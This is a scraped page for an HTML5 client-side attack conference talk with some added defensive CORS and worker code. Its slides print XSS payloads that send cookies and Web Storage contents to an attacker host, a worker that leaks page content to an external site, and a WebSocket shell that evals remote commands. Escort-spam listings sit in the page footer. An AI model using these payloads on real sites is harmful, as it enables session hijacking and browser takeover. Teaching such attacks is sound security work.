Building Client-Side Attacks with <HTML5> features

Tiago Ferreira
tiago.ccna@gmail.com
AGENDA
ABOUT ME


•   Almost 4 years working with IT network devices and 5
    years with security (MSS, Pentest, VA, etc).

•   Focus on Web Application vulnerabilities exploitation.

•   Security analyst at CONVISO Application Security.

•   Member of the research group Alligator Security Team.
A few words about Same Origin Policy
•   Perhaps the most important security concept within modern browsers.

•   The policy permits scripts running on pages originating from the same
    site to access each other's methods and properties.

•   Prevents access to most methods and properties across pages on
    different sites.

•   An origin is defined by the protocol, host/domain, and port of a URL:

     o   http://www.example.com/dir/page.html
     o   https://www.example.com/dir/page2.html
     o   http://www.example.com:8080/dir/page.html
     o   http://en.example.com/dir/other.html

•   In practice, there is no single same-origin policy:

     o   DOM access, XMLHttpRequest, cookies, Flash, Java, Silverlight,
         etc. each apply their own variant of it.
HTML5 Overview
•   The Hypertext Markup Language version 5 (HTML5) is the
    successor of HTML 4.01, XHTML 1.0 and XHTML 1.1.

•   It brings several new technologies to the browser that did not
    exist before, such as:

     o   New DOM interfaces
     o   New forms elements
     o   Enhanced XHR (Level 2)
     o   Web Storage
     o   Web Socket
     o   Web Workers
     o   File API
     o   Many new attributes

•   HTML5 provides new features to web applications but also
    introduces new security issues.
CORS (Cross-Origin Resource Sharing)
CORS

•   CORS is a web browser technology that enables client-side APIs
    to make cross-origin requests to external resources.

•   A new HTTP response header is defined: "Access-Control-Allow-Origin".

        HTTP/1.1 200 OK
        Server: Apache
        Content-Type: text/html
        Access-Control-Allow-Origin: http://example.com/


•   First the UA makes the request to the foreign domain and then
    checks the access control based on the returned Access-Control-
    Allow-Origin header.

•   The decision whether the API (XMLHttpRequest) is allowed to
    access foreign domains is made in the UA.
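How the UA derives an origin from a URL and then applies the Access-Control-Allow-Origin check, as an added example in JavaScript (not code from the slides). The header map and the `withCredentials` flag are assumptions modelled on the Fetch standard's CORS check; only the standard URL class is used.

```javascript
// Added example, not from the slides: how a user agent turns a URL into an
// origin and how it applies the Access-Control-Allow-Origin check before
// letting a script read a cross-origin XMLHttpRequest response.
// Only the standard URL class is used (available in browsers and Node.js).

// An origin is the (scheme, host, port) triple; a default port is implied by
// the scheme, so http://host:80 and http://host are the same origin.
function originOf(url) {
  return new URL(url).origin;            // e.g. "http://www.example.com:8080"
}

function sameOrigin(urlA, urlB) {
  return originOf(urlA) === originOf(urlB);
}

// Simplified UA-side CORS check. `headers` is a constructed map of lowercase
// response header names to values; `withCredentials` models the XHR flag.
function corsAllows(requestOrigin, headers, withCredentials) {
  const allow = headers['access-control-allow-origin'];
  if (allow === undefined) return false;   // no header: response stays opaque
  if (allow === '*') {
    // "Universal allow": any site may read the response, except that the
    // wildcard is refused for requests that carried cookies or HTTP auth.
    return !withCredentials;
  }
  // The value is compared byte-for-byte with the serialized request origin,
  // so "http://example.com/" (trailing slash) never matches "http://example.com".
  if (allow !== requestOrigin) return false;
  if (withCredentials) {
    return headers['access-control-allow-credentials'] === 'true';
  }
  return true;
}

// The URLs from the same-origin slide, compared against the first one.
function originTable() {
  const base = 'http://www.example.com/dir/page.html';
  const others = [
    'https://www.example.com/dir/page2.html',    // different scheme
    'http://www.example.com:8080/dir/page.html', // different port
    'http://en.example.com/dir/other.html',      // different host
    'http://www.example.com:80/dir/other.html',  // default port: same origin
  ];
  return others.map((u) => ({ url: u, origin: originOf(u), same: sameOrigin(base, u) }));
}
```

Note that the header value shown on the slide, `http://example.com/`, carries a trailing slash and would therefore not match any origin in a real browser.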
CORS

•   Potential threats

     o   Information gathering
           - Response-time-based intranet scanning

     o   Universal Allow
           - Bypass of access control

     o   Remote attacks on a web server
           - The UA can be used to attack another web server

     o   DDoS attacks combined with Web Workers
Web Storage
•   Web Storage gives websites the possibility to store data on the
    user's browser. The information can be accessed later using
    JavaScript.

•   Web storage offers two different storage areas:

     o   Local Storage
     o   Session Storage

•   Web storage provides far greater storage capacity (between 5 MB
    and 10 MB, depending on the browser).

•   It is supported by: Internet Explorer 8, Mozilla-based browsers
    (e.g., Firefox 2+, officially from 3.5), Safari 4, Google Chrome 4
    (sessionStorage is from 5), Opera 10.50.
localStorage
•   Data placed in local storage is per domain and persists after the
    browser is closed.

•   To store a value on the browser:

     o   localStorage.setItem(key, value);

•   To read a value stored on the browser:

     o   localStorage.getItem(key);

•   Security considerations:

     o   Sensitive data can be stolen;
     o   Data can be spoofed;
     o   Persistent attack vectors.
sessionStorage

•   Session storage is per-page-per-window and is limited to the
    lifetime of the window.

•   Store value on the browser:

     o   sessionStorage.setItem('key', 'value');

•   Read value stored on the browser:

     o   sessionStorage.getItem(key);

•   Security considerations:

     o   There's no 'path' attribute;
     o   There's no 'httpOnly' attribute;
     o   Session hijacking (XSS, session fixation).
Attack: Session hijacking using XSS

•   Old XSS payload to get cookies

    var a = new Image(); a.src = "http://attacker-ip/cookie=" + document.cookie;

•   New XSS payload

    var a = new Image(); a.src = "http://attacker-ip/cookie=" +
    sessionStorage.getItem('SessionID');
Attack: Session hijacking using XSS

DEMO

<script>
for (var i = 0; i < sessionStorage.length; i++) {
   var key = sessionStorage.key(i);
   var a = new Image();
   a.src = "http://attacker-ip/Storage.html?key=" + key +
           "&value=" + sessionStorage.getItem(key);
}
</script>
Attack: Stealing HTML5 localStorage

DEMO

<script>
for (var i = 0; i < localStorage.length; i++) {
   var key = localStorage.key(i);
   var a = new Image();
   a.src = "http://attacker-ip/Storage.html?key=" + key +
           "&value=" + localStorage.getItem(key);
}
</script>
Web workers

•   API for spawning background scripts in a web
    application via JavaScript.

     o   Real OS-level threads and concurrency.
     o   Managed communication through posting
         messages to the background worker.

•   Web Workers run in an isolated thread.

•   Workers do NOT have access to: DOM, window,
    document, and parent objects.

•   Security validation is based on the same-origin principle.
Spawning a worker

http://owasp.org/index.html

<script>
var worker = new Worker("worker.js");

worker.onmessage = function(event){
  // the worker's reply arrives in event.data
  document.getElementById('response').textContent = event.data;
};
// postMessage() requires a message argument; the slide called it with none
worker.postMessage('start');
</script>
…
<pre id="response"></pre>

http://owasp.org/worker.js

self.onmessage = function(event){
  self.postMessage('Hello World');
};
Workers – Available features
•   The location object (read-only).

•   The navigator object

•   setTimeout()/clearTimeout() and setInterval()/clearInterval().

•   Spawning other web workers.

•   postMessage()
     o send data to the worker (strings, JSON objects, etc).

•   Event support (addEventListener, dispatchEvent, removeEventListener).

•   importScripts
     o importScripts('http://external.com/script.js').

•   XMLHttpRequest.
Sending data to worker

http://owasp.org/index.html

<script>
var worker = new Worker("worker.js");

worker.onmessage = function(event){
  document.getElementById('response').textContent = event.data;
};

worker.postMessage('Hello OWASP Floripa');
</script>

http://owasp.org/worker.js

self.onmessage = function(event){
  // echo the received data back; the event object itself cannot be cloned
  self.postMessage(event.data);
};
Attack: Bypass SOP with importScripts()

  •   Workers make a natural sandbox for running untrusted code.

  •   Workers can't access page content.

  •   importScripts() permits running third-party code in your domain.
http://owasp.org/teste.js

var sandbox = new Worker('sandbox.js');
sandbox.postMessage('http://external.site/badguy.js');

http://owasp.org/sandbox.js

onmessage = function(e){
  importScripts(e.data);
  postMessage(this['someUntrustedFunction']());
};
Attack: Bypass SOP with importScripts()

•   But workers can run XMLHttpRequests (DEMO)

     o   The script is running in the origin of the parent page
           (http://owasp.org/teste.js).

     o   It can read any content on your domain.

http://external.site/badguy.js

var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://owasp.org/index.html', true);
xhr.onreadystatechange = function(e){
    if (e.target.readyState == 4){
        var remote_data = e.target.responseText;
        // the page content leaves the origin as part of a script URL
        importScripts('http://external.site/remote-page-content=' + remote_data);
    }
};
xhr.send();
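The check the sandbox worker above lacks, as an added example (not code from the slides): before handing a message-supplied URL to importScripts(), resolve it and refuse anything that is not on an allow-list of origins. The allow-list contents and the function names are assumptions.

```javascript
// Added example, not from the slides: a worker that only imports scripts
// from an allow-list of origins. The slide's sandbox.js imports whatever URL
// it is sent; this version resolves the URL first and refuses the rest.
// The allow-list below is a constructed sample.
const ALLOWED_SCRIPT_ORIGINS = ['http://owasp.org'];

// Returns the resolved absolute URL if it may be imported, otherwise null.
function resolveAllowedScript(rawUrl, workerLocation, allowed) {
  let url;
  try {
    // relative URLs resolve against the worker's own location
    url = new URL(rawUrl, workerLocation);
  } catch (e) {
    return null;                           // unparsable input
  }
  // data:, blob: and javascript: URLs carry inline code and are never allowed.
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  // The origin includes the scheme, so https://owasp.org is not http://owasp.org.
  if (!allowed.includes(url.origin)) return null;
  return url.href;
}

// Message handler. `importer` is importScripts inside a real worker; it is a
// parameter so the decision logic can be exercised outside a worker.
function handleMessage(e, importer, workerLocation) {
  const href = resolveAllowedScript(e.data, workerLocation, ALLOWED_SCRIPT_ORIGINS);
  if (href === null) {
    return { ok: false, error: 'script origin not allowed: ' + String(e.data) };
  }
  importer(href);
  return { ok: true, loaded: href };
}

// Wire it up only when actually running inside a Worker.
if (typeof self !== 'undefined' && typeof importScripts === 'function') {
  self.onmessage = function (e) {
    self.postMessage(handleMessage(e, importScripts, self.location.href));
  };
}
```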
Attack: DDoS with CORS and Web Workers

•   Start a Web Worker that fires multiple cross-origin
    requests at the target.

•   Thanks to CORS, it can send GET/POST requests to
    any website.

•   Sending a cross-domain GET request is nothing new
    (IMG tag or SCRIPT).

•   So simply by getting someone to visit a URL you can
    get them to send 10,000 HTTP requests/minute.

•   Can be spread with social engineering techniques
    (malicious URL, XSS vulnerabilities).
Attack: DDoS with CORS and Web Workers

[Diagram: the attacker injects an XSS payload into the vulnerable XSS web site; the browsers of the XSS victims then send their requests at the target web site.]

DEMO
Web Sockets
•   Web Sockets is a web technology that provides bi-directional,
    full-duplex communication channels over a single TCP
    connection.

•   The connection is established by upgrading from HTTP to the
    Web Socket protocol.

•   Web servers are now able to send content to the browser without
    being solicited by the client, which allows messages to be passed
    back and forth while keeping the connection open.

•   URI schemes: ws:// and wss://

•   Threats that can be exploited:

     o   Remote shell, web-based botnet, port scanning
Web Sockets – XSS Shell

DEMO

<script>
var connection = new WebSocket('ws://attacker-ip:port');
connection.onopen = function (){
   connection.send('null');
};

connection.onmessage = function(event){
   eval(event.data);
};
</script>
Questions ?

Encontrando falhas em aplicações web baseadas em flash
Conviso Application Security
 
Protegendo Aplicações Php com PHPIDS - Php Conference 2009
Protegendo Aplicações Php com PHPIDS - Php Conference 2009Protegendo Aplicações Php com PHPIDS - Php Conference 2009
Protegendo Aplicações Php com PHPIDS - Php Conference 2009
Conviso Application Security
 
Playing Web Fuzzing - H2HC 2009
Playing Web Fuzzing - H2HC 2009Playing Web Fuzzing - H2HC 2009
Playing Web Fuzzing - H2HC 2009
Conviso Application Security
 
OWASP Top 10 e aplicações .Net - Tech-Ed 2007
OWASP Top 10 e aplicações .Net - Tech-Ed 2007OWASP Top 10 e aplicações .Net - Tech-Ed 2007
OWASP Top 10 e aplicações .Net - Tech-Ed 2007
Conviso Application Security
 
Abotoaduras & Bonés
Abotoaduras & BonésAbotoaduras & Bonés
Abotoaduras & Bonés
Conviso Application Security
 
Tratando as vulnerabilidades do Top 10 com php
Tratando as vulnerabilidades do Top 10 com phpTratando as vulnerabilidades do Top 10 com php
Tratando as vulnerabilidades do Top 10 com php
Conviso Application Security
 

More from Conviso Application Security (20)

Entendendo o PCI-DSS
Entendendo o PCI-DSSEntendendo o PCI-DSS
Entendendo o PCI-DSS
 
Integrando testes de segurança ao processo de desenvolvimento de software
Integrando testes de segurança ao processo de desenvolvimento de softwareIntegrando testes de segurança ao processo de desenvolvimento de software
Integrando testes de segurança ao processo de desenvolvimento de software
 
Uma verdade inconveniente - Quem é responsável pela INsegurança das aplicações?
Uma verdade inconveniente - Quem é responsável pela INsegurança das aplicações? Uma verdade inconveniente - Quem é responsável pela INsegurança das aplicações?
Uma verdade inconveniente - Quem é responsável pela INsegurança das aplicações?
 
“Web Spiders” – Automação para Web Hacking
“Web Spiders” – Automação para Web Hacking“Web Spiders” – Automação para Web Hacking
“Web Spiders” – Automação para Web Hacking
 
Você Escreve Código e Quem Valida?
Você Escreve Código e Quem Valida?Você Escreve Código e Quem Valida?
Você Escreve Código e Quem Valida?
 
Testar não é suficiente. Tem que fazer direito!
Testar não é suficiente. Tem que fazer direito!Testar não é suficiente. Tem que fazer direito!
Testar não é suficiente. Tem que fazer direito!
 
Implementando Segurança em desenvolvimento com a verdadeira ISO
Implementando Segurança em desenvolvimento com a verdadeira ISOImplementando Segurança em desenvolvimento com a verdadeira ISO
Implementando Segurança em desenvolvimento com a verdadeira ISO
 
Automatizando a análise passiva de aplicações Web
Automatizando a análise passiva de aplicações WebAutomatizando a análise passiva de aplicações Web
Automatizando a análise passiva de aplicações Web
 
Você confia nas suas aplicações mobile?
Você confia nas suas aplicações mobile?Você confia nas suas aplicações mobile?
Você confia nas suas aplicações mobile?
 
Pentest em Aplicações Móveis
Pentest em Aplicações MóveisPentest em Aplicações Móveis
Pentest em Aplicações Móveis
 
MASP: Um processo racional para garantir o nível de proteção das aplicações w...
MASP: Um processo racional para garantir o nível de proteção das aplicações w...MASP: Um processo racional para garantir o nível de proteção das aplicações w...
MASP: Um processo racional para garantir o nível de proteção das aplicações w...
 
HTML5 Seguro ou Inseguro?
HTML5 Seguro ou Inseguro?HTML5 Seguro ou Inseguro?
HTML5 Seguro ou Inseguro?
 
Threats from economical improvement rss 2010
Threats from economical improvement rss 2010Threats from economical improvement rss 2010
Threats from economical improvement rss 2010
 
O processo de segurança em desenvolvimento, que não é ISO 15.408
O processo de segurança em desenvolvimento, que não é ISO 15.408O processo de segurança em desenvolvimento, que não é ISO 15.408
O processo de segurança em desenvolvimento, que não é ISO 15.408
 
Encontrando falhas em aplicações web baseadas em flash
Encontrando falhas em aplicações web baseadas em flashEncontrando falhas em aplicações web baseadas em flash
Encontrando falhas em aplicações web baseadas em flash
 
Protegendo Aplicações Php com PHPIDS - Php Conference 2009
Protegendo Aplicações Php com PHPIDS - Php Conference 2009Protegendo Aplicações Php com PHPIDS - Php Conference 2009
Protegendo Aplicações Php com PHPIDS - Php Conference 2009
 
Playing Web Fuzzing - H2HC 2009
Playing Web Fuzzing - H2HC 2009Playing Web Fuzzing - H2HC 2009
Playing Web Fuzzing - H2HC 2009
 
OWASP Top 10 e aplicações .Net - Tech-Ed 2007
OWASP Top 10 e aplicações .Net - Tech-Ed 2007OWASP Top 10 e aplicações .Net - Tech-Ed 2007
OWASP Top 10 e aplicações .Net - Tech-Ed 2007
 
Abotoaduras & Bonés
Abotoaduras & BonésAbotoaduras & Bonés
Abotoaduras & Bonés
 
Tratando as vulnerabilidades do Top 10 com php
Tratando as vulnerabilidades do Top 10 com phpTratando as vulnerabilidades do Top 10 com php
Tratando as vulnerabilidades do Top 10 com php
 

Recently uploaded

Mule Experience Hub and Release Channel with Java 17
Mule Experience Hub and Release Channel with Java 17Mule Experience Hub and Release Channel with Java 17
Mule Experience Hub and Release Channel with Java 17
Bhajan Mehta
 
Types of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technologyTypes of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technology
ldtexsolbl
 
Patch Tuesday de julio
Patch Tuesday de julioPatch Tuesday de julio
Patch Tuesday de julio
Ivanti
 
Communications Mining Series - Zero to Hero - Session 3
Communications Mining Series - Zero to Hero - Session 3Communications Mining Series - Zero to Hero - Session 3
Communications Mining Series - Zero to Hero - Session 3
DianaGray10
 
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
shanihomely
 
Google I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged SlidesGoogle I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged Slides
Google Developer Group - Harare
 
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision MakingConnector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
DianaGray10
 
Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10
ankush9927
 
Semantic-Aware Code Model: Elevating the Future of Software Development
Semantic-Aware Code Model: Elevating the Future of Software DevelopmentSemantic-Aware Code Model: Elevating the Future of Software Development
Semantic-Aware Code Model: Elevating the Future of Software Development
Baishakhi Ray
 
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
bellared2
 
Acumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptxAcumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptx
BrainSell Technologies
 
Vertex AI Agent Builder - GDG Alicante - Julio 2024
Vertex AI Agent Builder - GDG Alicante - Julio 2024Vertex AI Agent Builder - GDG Alicante - Julio 2024
Vertex AI Agent Builder - GDG Alicante - Julio 2024
Nicolás Lopéz
 
Opencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of MünsterOpencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of Münster
Matthias Neugebauer
 
Improving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning ContentImproving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning Content
Enterprise Knowledge
 
Generative AI Reasoning Tech Talk - July 2024
Generative AI Reasoning Tech Talk - July 2024Generative AI Reasoning Tech Talk - July 2024
Generative AI Reasoning Tech Talk - July 2024
siddu769252
 
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
FIDO Alliance
 
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
sunilverma7884
 
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python CodebaseEuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
Jimmy Lai
 
Finetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and DefendingFinetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and Defending
Priyanka Aash
 
Uncharted Together- Navigating AI's New Frontiers in Libraries
Uncharted Together- Navigating AI's New Frontiers in LibrariesUncharted Together- Navigating AI's New Frontiers in Libraries
Uncharted Together- Navigating AI's New Frontiers in Libraries
Brian Pichman
 

Recently uploaded (20)

Mule Experience Hub and Release Channel with Java 17
Mule Experience Hub and Release Channel with Java 17Mule Experience Hub and Release Channel with Java 17
Mule Experience Hub and Release Channel with Java 17
 
Types of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technologyTypes of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technology
 
Patch Tuesday de julio
Patch Tuesday de julioPatch Tuesday de julio
Patch Tuesday de julio
 
Communications Mining Series - Zero to Hero - Session 3
Communications Mining Series - Zero to Hero - Session 3Communications Mining Series - Zero to Hero - Session 3
Communications Mining Series - Zero to Hero - Session 3
 
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
 
Google I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged SlidesGoogle I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged Slides
 
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision MakingConnector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
 
Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10
 
Semantic-Aware Code Model: Elevating the Future of Software Development
Semantic-Aware Code Model: Elevating the Future of Software DevelopmentSemantic-Aware Code Model: Elevating the Future of Software Development
Semantic-Aware Code Model: Elevating the Future of Software Development
 
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
 
Acumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptxAcumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptx
 
Vertex AI Agent Builder - GDG Alicante - Julio 2024
Vertex AI Agent Builder - GDG Alicante - Julio 2024Vertex AI Agent Builder - GDG Alicante - Julio 2024
Vertex AI Agent Builder - GDG Alicante - Julio 2024
 
Opencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of MünsterOpencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of Münster
 
Improving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning ContentImproving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning Content
 
Generative AI Reasoning Tech Talk - July 2024
Generative AI Reasoning Tech Talk - July 2024Generative AI Reasoning Tech Talk - July 2024
Generative AI Reasoning Tech Talk - July 2024
 
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
 
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
 
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python CodebaseEuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
 
Finetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and DefendingFinetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and Defending
 
Uncharted Together- Navigating AI's New Frontiers in Libraries
Uncharted Together- Navigating AI's New Frontiers in LibrariesUncharted Together- Navigating AI's New Frontiers in Libraries
Uncharted Together- Navigating AI's New Frontiers in Libraries
 

Building Client-Side Attacks with HTML5 Features

1. Building Client-Side Attacks with <HTML5> features

   Tiago Ferreira
   tiago.ccna@gmail.com
3. ABOUT ME

•   Almost 4 years working with IT network devices and 5 years with security (MSS, Pentest, VA, etc).
•   Focus on Web Application vulnerabilities exploitation.
•   Security analyst at CONVISO Application Security.
•   Member of the research group Alligator Security Team.
4. A few words about Same Origin Policy

•   Perhaps the most important security concept within modern browsers.
•   The policy permits scripts running on pages originating from the same site to access each other's content.
•   Prevents access to most methods and properties across pages on different sites.
•   An origin is defined by the protocol, host/domain, and port of a URL:
     o   http://www.example.com/dir/page.html
     o   https://www.example.com/dir/page2.html
     o   http://www.example.com:8080/dir/page.html
     o   http://en.example.com/dir/other.html
•   In practice, there is no single same-origin policy:
     o   DOM access, XMLHttpRequest, Cookies, Flash, Java, Silverlight, etc.
5. HTML5 Overview

•   The Hypertext Markup Language version 5 (HTML5) is the successor of HTML 4.01, XHTML 1.0 and XHTML 1.1.
•   It brings several new technologies to the browser that it did not have before, such as:
     o   New DOM interfaces
     o   New form elements
     o   Enhanced XHR (Level 2)
     o   Web Storage
     o   Web Socket
     o   Web Workers
     o   File API
     o   Many new attributes
•   HTML5 provides new features to web applications but also introduces new security issues.
6. CORS - (Cross-Origin Resource Sharing)
7. CORS

•   CORS is a web browser technology that enables client-side APIs to make cross-origin requests to external resources.
•   A new HTTP header is defined: "Access-Control-Allow-Origin".

        HTTP/1.1 200 OK
        Server: Apache
        Content-Type: text/html
        Access-Control-Allow-Origin: http://example.com/

•   First the UA makes the request to the foreign domain and then checks the access control based on the returned Access-Control-Allow-Origin header.
•   The decision whether the API (XMLHttpRequest) is allowed to access foreign domains is made in the UA.
8. CORS

•   Potential threats
     o   Information gathering - Response-time-based intranet scanning
     o   Universal Allow - Bypass access control
     o   Remotely attacking a web server - the UA can be used to attack another web server
     o   DDoS attacks combined with Web Workers
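The slides show the Access-Control-Allow-Origin header being returned and note that the browser enforces whatever the server answers, so the server-side policy that chooses the header value is what the "Universal Allow" threat is really about. The following is an added example (not part of the talk): the two weak policies next to an allowlist-based one, written as plain Node.js functions so the decision logic can be exercised without a server. The origins in the allowlist are constructed sample values.

```javascript
// Added example: server-side choice of the Access-Control-Allow-Origin value.
// Origins used below (app.example.com, admin.example.com, evil.example) are constructed.

// Weak policy 1 ("Universal Allow" on the slide): every origin may read the response.
function corsHeadersUniversalAllow(requestOrigin) {
  return { "Access-Control-Allow-Origin": "*" };
}

// Weak policy 2: reflecting the request's Origin header unconditionally. It looks
// restrictive because a concrete origin is returned, but every site is granted
// access, and unlike "*" this value may be combined with credentials.
function corsHeadersReflect(requestOrigin) {
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Normalise an origin string to scheme://host[:port]; default ports are dropped
// and the host is lower-cased by the URL parser, so "HTTPS://App.Example.com:443"
// compares equal to "https://app.example.com". Anything that is not a bare origin
// (a path, query, userinfo, or the literal "null") yields null.
function normalizeOrigin(origin) {
  let url;
  try {
    url = new URL(origin);
  } catch (e) {
    return null;
  }
  if (url.pathname !== "/" || url.search || url.hash || url.username) return null;
  return url.origin;
}

// Hardened policy: exact match against an allowlist. No CORS headers at all are
// emitted for unknown origins, so the browser refuses the cross-origin read.
function corsHeadersAllowlist(requestOrigin, allowlist) {
  const origin = normalizeOrigin(requestOrigin);
  if (origin === null) return {};
  const allowed = new Set(allowlist.map(normalizeOrigin).filter(Boolean));
  if (!allowed.has(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin, // echo only an allowlisted origin, never "*"
    "Access-Control-Allow-Credentials": "true",
    Vary: "Origin", // stop caches from serving one origin's answer to another
  };
}

module.exports = { corsHeadersUniversalAllow, corsHeadersReflect, normalizeOrigin, corsHeadersAllowlist };
```

The allowlist check compares whole origins, so a look-alike such as https://app.example.com.evil.example or a different scheme on the same host does not match; substring or regex matching on the Origin header is the usual way this check goes wrong.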
10. Web Storage

•   Web Storage gives websites the possibility to store data in the user's browser. The information can be accessed later using JavaScript.
•   Web storage offers two different storage areas:
     o   Local Storage
     o   Session Storage
•   Web storage provides far greater storage capacity (depending on the browser, between 5 MB and 10 MB).
•   It is supported by: Internet Explorer 8, Mozilla-based browsers (e.g., Firefox 2+, officially from 3.5), Safari 4, Google Chrome 4 (sessionStorage from 5), Opera 10.50.
11. localStorage

•   Data placed in local storage is per domain and persists after the browser is closed.
•   To store a value in the browser:
     o   localStorage.setItem(key, value);
•   To read a value stored in the browser:
     o   localStorage.getItem(key);
•   Security considerations:
     o   Sensitive data can be stolen;
     o   Data can be spoofed;
     o   Persistent attack vectors.
12. sessionStorage

•   Session storage is per-page-per-window and is limited to the lifetime of the window.
•   To store a value in the browser:
     o   sessionStorage.setItem('key', 'value');
•   To read a value stored in the browser:
     o   sessionStorage.getItem(key);
•   Security considerations:
     o   There's no 'path' attribute;
     o   There's no 'httpOnly' attribute;
     o   Session hijacking (XSS, session fixation).
13. Attack: Session hijacking using XSS

•   Old XSS payload to get cookies

        var a = new Image();
        a.src = "http://attacker-ip/cookie=" + document.cookie;

•   New XSS payload

        var a = new Image();
        a.src = "http://attacker-ip/cookie=" + sessionStorage.getItem('SessionID');
14. Attack: Session hijacking using XSS (DEMO)

        <script>
        for (var i = 0; i < sessionStorage.length; i++) {
            var key = sessionStorage.key(i);
            var a = new Image();
            a.src = "http://attacker-ip/Storage.html?key=" + key + "&value=" + sessionStorage.getItem(key);
        }
        </script>
15. Attack: Stealing HTML5 localStorage (DEMO)

        <script>
        for (var i = 0; i < localStorage.length; i++) {
            var key = localStorage.key(i);
            var a = new Image();
            a.src = "http://attacker-ip/Storage.html?key=" + key + "&value=" + localStorage.getItem(key);
        }
        </script>
